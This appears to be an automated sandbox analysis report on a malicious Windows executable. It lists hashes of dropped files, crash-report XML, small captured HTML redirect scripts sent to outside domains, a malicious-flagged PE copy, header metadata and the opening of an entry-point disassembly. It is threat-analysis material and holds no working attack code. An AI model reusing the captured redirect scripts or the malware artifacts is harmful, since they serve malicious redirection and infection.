                                                                                                                                                                                                          SHA-512:8D3F869B3F81868EF0AC6872637510A1174A1BA1BE96EF3E249C8B1BCB5E33633255C5D5CB765F8106FF8A54E9CE2D58EBD64E53C64E5EB496F4313363DA0BDF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5368</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.7055810339434005
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJYJ6I6YcDPLSUpPgmfWXprZ89bv+sf0wFm:R6lXJe6I6YUSUpPgmfWsv9fS
                                                                                                                                                                                                          MD5:0CA7326EE6B5A5DD9E8ACC0FE144D04A
                                                                                                                                                                                                          SHA1:6CFD938C2C95EDF39AA5F84ADFC8AD50AC6BDB5C
                                                                                                                                                                                                          SHA-256:A442D867DEEB23F67B89ED2DCA920C9225FC52C7ECD151B6DB64C534AF3E0273
                                                                                                                                                                                                          SHA-512:93FB4FFBD8E887B54AF3B4F80397535050688CA86C58C0B56567CDEEE5C3812548ADF696C758FBC19EDE9E2C2C6C5641C872AC47EF0F1170FD541FA696B75C19
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6928</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.509599020473798
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYUYm8M4JYLBFXW/+q8x7cVGZW8td:uIjfWI7Gu7VkJQr+IcVX8td
                                                                                                                                                                                                          MD5:EB8CA79ADA2139BAA586C0F004E17CB9
                                                                                                                                                                                                          SHA1:71F10E3F9154AC05ACE29244AE8484AF4883E641
                                                                                                                                                                                                          SHA-256:825EC8E604DBBF0EC5F1A2712794C9823B9CC6A1A594C609BB90FC9CE04E8346
                                                                                                                                                                                                          SHA-512:CFE6CB6E31F28389A5332EC77C8F580926CFAEE055F569DA67C1605D20FCFDB3844D24B057FE0B89162C3EB7D59151EDEC1229DCF98D7828C56EC10BA6C54555
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.5096987113342335
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYtYm8M4JYLBF2+q8x71GZW8yd:uIjfWI7Gu7VNJQKI1X8yd
                                                                                                                                                                                                          MD5:A4682AB993BBB16CC70DE4F431FF3661
                                                                                                                                                                                                          SHA1:ECBAD0AE719083964E0B4024F7644FF79CF0D332
                                                                                                                                                                                                          SHA-256:31BE3BE1E326FD941477F159BB85C7CA5F265CAB8FFF7299410E96E2A2C825CE
                                                                                                                                                                                                          SHA-512:17D33100C597AEC0ADC6B6C4FD081CFF2CC256A988AF042E9926B452C6D06CFE1D47779F49567D14F338DAD867F8259DAA4466A7572EE5A6B0A3A4A5799F838B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:07 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):71808
                                                                                                                                                                                                          Entropy (8bit):1.8670965048867207
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:bUNykY7JWxzaub8HxYVOSBS1PWpIlHFzG7DW:stYFYzrYHTSWW2sD
                                                                                                                                                                                                          MD5:1AB99792BC7B69162209B85BD5D5C604
                                                                                                                                                                                                          SHA1:E32CF53F413BBDA5FD59E9D755CF62AF387C527C
                                                                                                                                                                                                          SHA-256:0E4B95DEEBFBC70B6C5E81F133D30038F1F561313DA32E42315A66B9C8E7DCE3
                                                                                                                                                                                                          SHA-512:AEEAAA4FB6890DF28EEE5E0838D8C011AEC3F0A302C1AD215552157FB854EA1E9CE962AE2A7B9A59F7A0073C86B7047A02D59600DC242E60862D82479B610305
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:07 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):94454
                                                                                                                                                                                                          Entropy (8bit):1.8508060952847785
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ZABVWVXOcXKAh2PSdOK8Zr71bMqx8ykW3aRw7k+qmuMhTCnSa8XkRj9MzJUA5gg:ifbAh2qQzZNbzayb3JqmuMl4QkRj9Lx
                                                                                                                                                                                                          MD5:4A5102555C5C453179DFA9BCF37CF51D
                                                                                                                                                                                                          SHA1:09A11E53698C6485760A551EE96F054E5FCC4772
                                                                                                                                                                                                          SHA-256:1668188809279AE9C9220362651370DB592D333E2DAC961B4BCD8052504CE062
                                                                                                                                                                                                          SHA-512:0442ADECB560F05CA2B3AD1AE64FB4786B5185C1DC3EF3EC50BCC04118AF12C1375AAE7F0F97B684F2946FBA17476AE894EB59C8A3F308CE62C878AEA2E1DA38
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.70752355273682
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJJj6TVl6YcDbSUDsgmfWXprz89b4bOsfI+jm:R6lXJN6j6Y8SUDsgmfWO4bNf16
                                                                                                                                                                                                          MD5:F6C4D3113BE6EBDA589DBCCD1AFD7738
                                                                                                                                                                                                          SHA1:5FD245E712C15ABE3F69B443E4972426F65EAA84
                                                                                                                                                                                                          SHA-256:1024E90ABEB0561B4F5EC296886C53641BBCB37BD870E36C4C4E6F4C64A581AA
                                                                                                                                                                                                          SHA-512:BF0A3453BE447CE0F3EBC32C4499604401127377BC76AEED086FF3B03A7CB1D8C71187A11094BE59D0BB14D11210F3676673FD16087CFFA8E42693B32FFA7081
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3816</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.508864543441499
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYlYm8M4JYLBFus+q8x7YBGZW88d:uIjfWI7Gu7VlJQ7IYBX88d
                                                                                                                                                                                                          MD5:98C138186D911D7B092B5BACEA5F9C0B
                                                                                                                                                                                                          SHA1:4BCF435DC4A688081461C33F8D206F219673BA4B
                                                                                                                                                                                                          SHA-256:EA6F9DEE6B71035DB82C29FEF7EEA009027ED6674E37E43DD73CA057C2B7612B
                                                                                                                                                                                                          SHA-512:EE39E9093A8EAD99784F4B0C3006AE4C7F913CAE702CF22BB343DBB68D6C4638776783133DF38BF6F2159758F5C7740C6AB30ABEB65EECBECCC596EC7B3B88DC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.7058994674702217
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJxz6v46YcD8SUDsgmfWXpr+89b4bWsfwv+jm:R6lXJ16Q6YLSUDsgmfW94b1f16
                                                                                                                                                                                                          MD5:65FEBFA355FE567292722349CBBC36EA
                                                                                                                                                                                                          SHA1:C3CCE7122FD437EF657187E6E477C22EAD656DB4
                                                                                                                                                                                                          SHA-256:974F04B9607598F47056AC96B1EF84854D50AC3E967A71963F0DA1656A328A3E
                                                                                                                                                                                                          SHA-512:F2B74C45FCB8A2B51FFF925126B11477365FD6011BD8164E457A6FE0A80F9119C26A114545E7FA55CA3E07F0A97604A62C64A6DB96E202E81F9F6917C3C1E06B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4976</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.511632919910938
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYMFYm8M4JYLBF0+q8x73gGZW8ed:uIjfWI7Gu7VGJQII3gX8ed
                                                                                                                                                                                                          MD5:3A87B4118D13D74FFA409BF497A9F005
                                                                                                                                                                                                          SHA1:727E6571A5868D931D76C1E687B74E99DD193A01
                                                                                                                                                                                                          SHA-256:65B132D8D4061BAA1BA142014E423DFCC47678EF69186F46E29B145345E575BC
                                                                                                                                                                                                          SHA-512:FE2544FBC359D6F9DC16A9FD7EC3025B2D233440B44B85A934926D232BC36F3BA3B7B29DFD7BE76BB74D63D6561969A0503B5D60184FF234983B629C2E853E7E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                                          Entropy (8bit):4.43530643106624
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):4.470551863591405
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                          MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                          SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                          SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                          SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (481), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):481
                                                                                                                                                                                                          Entropy (8bit):5.818218214704804
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:kxvsCk9cE3MxlVT/XAUoJ8mhL+WWRACUYI:kbxxlVT/wcQ+Hd/I
                                                                                                                                                                                                          MD5:B61A8DC8A1A7E5D4A3966C078E9E4FE5
                                                                                                                                                                                                          SHA1:90E302E6FE4B4CCA46378B32EF58DD9EDB3A4DE3
                                                                                                                                                                                                          SHA-256:D0A6126A8EE21290C3E206B7DF9D8A157EBBB7E0AA9FC375FD59367BED1645A7
                                                                                                                                                                                                          SHA-512:363EE3AF0A37856D9BD7AECA572848D114887CD0B0A0BD9D18A7E0DB71F0B46CFDEB24E359AA791142963892A04A5A4E08F950A022204F3805E5A38104138EF5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc5MjgzMiwiaWF0IjoxNzI1Nzg1NjMyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqaG90ZDgwOTQxZ2JhaDQxZGl0ZTkiLCJuYmYiOjE3MjU3ODU2MzIsInRzIjoxNzI1Nzg1NjMyNzI4MzYwfQ.LG1EzBfX1ECbJXMCgcf9aj9iS9_3pAa-hmXKPDIsKPc&sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795');</script></body></html>
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\OjKmJJm2YT.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):216576
                                                                                                                                                                                                          Entropy (8bit):7.848215673191657
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:2rMoyX6dxajoPXA1nriwrw1cfCOSJcAb:kysxVY1nZ+b
                                                                                                                                                                                                          MD5:3AFDB594A34F95485CA05A57DFEF80CC
                                                                                                                                                                                                          SHA1:173F90C656015AEF5F07E318E352B10DAEE1A8D3
                                                                                                                                                                                                          SHA-256:9BDEB7AA43A7254463FBB28E70E1D5348E5A80445A605192FA519B2163919539
                                                                                                                                                                                                          SHA-512:95890421ED70442389154FF6DDA2E69B4E82F28AE57ABB08DD0F1CB44FE1A93E83AD3FB1BD361B9BEB5DF305E155463A41ED139C35B8D19245DDD7FF79BFB9DC
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.8?.................,......*.................@.......................... ......A.{=.............................................`..x...........................@&...............................................................................text....+.......,.................. ..`.D.......S...@.......0..............@....SC.....g............4..............@....Wp...... ...........<..............@..@.aS..................>..............@....vtzr....w...........B..............@..@.fvH....-.... .......R..............@..@.data....@.......B...Z..............@....Lx......@..........................@....sOZF...s(...P......................@....h..................................@....rsrc...x....`......................@..@.reloc...............J..............@..B........................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\OjKmJJm2YT.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):7.848215355979006
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:OjKmJJm2YT.exe
                                                                                                                                                                                                          File size:216'576 bytes
                                                                                                                                                                                                          MD5:ca30350fdb8b854abac0a08aa08ff89a
                                                                                                                                                                                                          SHA1:1204292ab1abc758ebfb9bf6d452b960eb6d977a
                                                                                                                                                                                                          SHA256:b1242f3aa475d93a247673616478365f3a7f9fb1edbe8075372a09455521a57d
                                                                                                                                                                                                          SHA512:3c7b4da948a5dcb4d3d8a01e844218fed339529fba7b90ee69c6a0cc5a35053474ae39cf6ddb18ae8ff14c6988e989b5eb15352f007e33a1825a0e3fcf374b79
                                                                                                                                                                                                          SSDEEP:6144:/rMoyX6dxajoPXA1nriwrw1cfCOSJcAb:HysxVY1nZ+b
                                                                                                                                                                                                          TLSH:EB240293F38A29E7C2200D3F12F7230711B74A615375C59BE641A66D3AD65C8BCE2A37
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.8?.................,......*.................@.......................... .......<S)...................................
                                                                                                                                                                                                          Icon Hash:000a35b5b5b5b555
                                                                                                                                                                                                          Entrypoint:0x401b81
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                          Time Stamp:0x3F38BB49 [Tue Aug 12 10:02:49 2003 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                          Import Hash:1c6c3b0bd56b7f130f1f283a88a358b9
                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          mov dword ptr [0042C4BBh], 00000000h
                                                                                                                                                                                                          mov eax, dword ptr [0042C4BBh]
                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          mov edx, 00000000h
                                                                                                                                                                                                          push edx
                                                                                                                                                                                                          call dword ptr [0041A0E8h]
                                                                                                                                                                                                          mov dword ptr [0042B3DBh], eax
                                                                                                                                                                                                          mov dword ptr [0042BE8Ah], 00000000h
                                                                                                                                                                                                          mov eax, dword ptr [0042BE8Ah]
                                                                                                                                                                                                          push 00000CD8h
                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                          sub dword ptr [0042B515h], ecx
                                                                                                                                                                                                          sub ecx, 00000B04h
                                                                                                                                                                                                          add ecx, 00000FC4h
                                                                                                                                                                                                          jc 00007FA49C4FA128h
                                                                                                                                                                                                          sub dword ptr [0042C68Fh], ecx
                                                                                                                                                                                                          sub dword ptr [0042BB7Fh], ecx
                                                                                                                                                                                                          shl ecx, 1
                                                                                                                                                                                                          ror ecx, 1
                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                          shr ecx, 03h
                                                                                                                                                                                                          add ecx, 0000020Ah
                                                                                                                                                                                                          jbe 00007FA49C4FA124h
                                                                                                                                                                                                          ror ecx, 1
                                                                                                                                                                                                          sub ecx, 0000063Ch
                                                                                                                                                                                                          add dword ptr [0042BBF3h], ecx
                                                                                                                                                                                                          call 00007FA49C4FB1E1h
                                                                                                                                                                                                          mov dword ptr [0042B16Ch], eax
                                                                                                                                                                                                          mov esi, 00000070h
                                                                                                                                                                                                          push esi
                                                                                                                                                                                                          mov ebx, 003B993Ch
                                                                                                                                                                                                          add ebx, 0004794Ch
